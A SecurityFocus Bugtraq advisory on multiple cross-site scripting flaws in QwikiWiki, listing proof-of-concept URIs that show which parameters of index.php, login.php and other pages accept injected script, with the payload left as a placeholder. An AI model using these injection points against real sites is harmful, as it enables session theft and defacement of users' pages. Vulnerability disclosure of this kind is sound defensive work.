Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

QwikiWiki Multiple Cross-Site Scripting Vulnerabilities

These issues can be exploited through use of a web client.

The following proof of concept URI are available:
http://www.example.com/index.php?page=Home&from=[XSS]
http://www.example.com/index.php?page=Home&help=[XSS]
http://www.example.com/index.php?page=Home&from=Home&help=[XSS]
http://www.example.com/login.php?page=Home&action=Login&action=[XSS]&debug=1&help=true&username=1&password=1
http://www.example.com/login.php?page=[XSS]&action=Login&action=Login&debug=1&help=true&username=1&password=1
http://www.example.com/login.php?page=Home&action=Login&action=Login&debug=[XSS]&help=true&username=1&password=1
http://www.example.com/login.php?page=Home&action=Login&action=Login&debug=1&help=[XSS]&username=1&password=1
http://www.example.com/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=[XSS]&password=1
http://www.example.com/login.php?page=Home&action=Login&action=Login&debug=1&help=true&username=1&password=[XSS]
http://www.example.com/pageindex.php?nothing=nothing&help=[XSS]
http://www.example.com/recentchanges.php?nothing=nothing&help=[XSS]







 

Privacy Statement
Copyright 2009, SecurityFocus